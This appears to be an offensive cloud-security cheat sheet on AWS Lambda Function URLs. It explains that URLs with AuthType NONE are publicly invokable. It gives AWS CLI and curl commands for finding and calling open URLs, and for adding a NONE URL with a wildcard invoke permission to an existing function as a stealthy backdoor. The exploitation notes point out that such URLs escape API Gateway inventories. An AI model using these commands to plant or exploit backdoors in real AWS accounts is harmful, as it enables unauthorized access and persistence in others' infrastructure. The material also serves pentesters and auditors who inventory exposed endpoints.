A Lambda Function URL is a dedicated HTTPS endpoint bound to a function. Its AuthType is either AWS_IAM or NONE; a URL set to NONE is invokable by anyone on the internet with no credential, which exposes the function (and everything it does under its execution role) directly. With lambda:CreateFunctionUrlConfig an attacker can also add a NONE URL to an existing function as a stealthy backdoor.
Finding and invoking an open URL#
aws lambda list-function-url-configs --function-name <fn> \
--query 'FunctionUrlConfigs[].[FunctionUrl,AuthType]'
curl -s "https://<url-id>.lambda-url.<region>.on.aws/" -d '{"k":"v"}'
Adding a URL as a backdoor#
aws lambda create-function-url-config --function-name <fn> --auth-type NONE
aws lambda add-permission --function-name <fn> --action lambda:InvokeFunctionUrl \
--principal '*' --function-url-auth-type NONE --statement-id open
Exploitation notes#
AuthType NONEplus anInvokeFunctionUrlpermission withPrincipal: *is fully public; both are needed and both are quiet config changes.- An existing function with sensitive logic or a powerful execution role becomes directly reachable the moment a
NONEURL is attached. - Function URLs do not appear in API Gateway listings, so they are easy to miss when inventorying exposed entry points.
Tools#
- AWS CLI (
lambda list-function-url-configs,create-function-url-config,add-permission). - curl / Burp Suite: invoking and fuzzing the endpoint.